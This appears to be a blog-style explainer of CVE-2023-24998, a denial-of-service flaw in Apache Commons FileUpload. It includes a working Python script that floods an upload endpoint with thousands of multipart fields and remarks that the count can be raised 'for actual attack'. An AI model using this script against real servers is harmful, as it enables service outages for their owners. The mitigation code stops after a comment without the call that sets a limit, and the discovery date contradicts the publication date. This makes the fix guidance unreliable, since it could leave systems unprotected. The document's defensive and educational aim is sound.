CVE-2023-24998 - Apache Commons FileUpload DoS Vulnerability Explained with Code Example and Exploit Details

Date of Discovery: March 2023  
CVSS Score: 7.5 (High)  
Component Affected: Apache Commons FileUpload (versions before 1.5)

What is CVE-2023-24998?

CVE-2023-24998 is a Denial-of-Service (DoS) vulnerability discovered in Apache Commons FileUpload, a widely-used Java library for handling file uploads in web applications. Versions before 1.5 of this library didn’t limit the number of request parts (uploaded files and form fields) processed in a single upload. This oversight allowed attackers to force a web server to process extremely large numbers of parts, using up memory and server resources until the application slowed down or crashed.

Why Does This Matter?

Many Java applications, including ones built on frameworks like Apache Struts or Spring, use FileUpload under the hood. If you haven’t patched or explicitly configured newest safety options, someone could crash your app with a few specially crafted uploads.

How Does the Attack Work?

An attacker sends a multipart/form-data POST request with thousands or millions of parts—these could be small files or even just form fields. Since FileUpload’s default configuration in versions below 1.5 doesn't limit the number of parts, your server tries to process them all. This eats up memory (heap) and processing time, eventually causing your app to hang or run out of memory.

Let’s see a simple Python script that sends a POST request with a massive number of parts

import requests

url = "http://target-server/upload";
boundary = "----WebKitFormBoundary7MA4YWxkTrZugW"
headers = { "Content-Type": f"multipart/form-data; boundary={boundary}" }

# Generate 10,000 dummy parts (can increase for actual attack)
body = ""
for i in range(10000):
    body += (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="field{i}"\r\n\r\n'
        f"value{i}\r\n"
    )
body += f"--{boundary}--\r\n"

response = requests.post(url, data=body, headers=headers)
print(response.status_code)

Warning: This example is for educational purpose only! Do not use it against systems you don’t own or have permission to test.


## How To Fix / Mitigate

Upgrade FileUpload:

Update Apache Commons FileUpload to version 1.5 or later.

ServletFileUpload upload = new ServletFileUpload();

// Set a reasonable max number of file parts, e.g., 100

References

- Official Apache Commons FileUpload Advisory
- NVD CVE-2023-24998 Entry
- GitHub Fix Commit

Conclusion

If you use Apache Commons FileUpload (directly or indirectly), you could be at risk of a simple but effective DoS attack. The fix is straightforward: upgrade to 1.5+ and set a sensible part count limit. Remember, protection is off by default—secure your uploads today, and you can avoid waking up to a crashed server tomorrow!

Timeline

Published on: 02/20/2023 16:15:00 UTC
Last modified on: 03/01/2023 15:09:00 UTC